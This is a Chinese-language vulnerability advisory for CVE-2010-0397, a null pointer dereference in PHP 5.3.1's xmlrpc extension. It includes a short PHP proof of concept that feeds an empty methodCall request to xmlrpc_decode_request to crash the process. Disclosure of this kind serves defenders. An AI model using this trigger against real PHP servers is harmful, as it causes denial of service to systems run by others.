发布日期：2010-03-12
更新日期：2010-03-18

受影响系统：

PHP PHP 5.3.1

描述：

---

BUGTRAQ  ID: 38708
CVE(CAN) ID: CVE-2010-0397

PHP是广泛使用的通用目的脚本语言，特别适合于Web开发，可嵌入到HTML中。

PHP所使用的xmlrpc扩展在解码畸形xml-rpc请求时存在空指针引用错误。如果请求为有效的xml但没有包含预期的标签，xmlrpc_decode_request就会生成分段错误并导致崩溃。

<*来源：Auke van Slooten （auke@muze.nl）
  
  链接：http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=573573
        http://www.openwall.com/lists/oss-security/2010/03/12/5
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<?php
$req = '<?xml version="1.0"?>
<methodCall>
   </methodCall>';
    $result = xmlrpc_decode_request( $req, $frop );
?>

建议：

---

厂商补丁：

PHP
---
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.php.net

浏览次数：2924
严重程度：0（网友投票）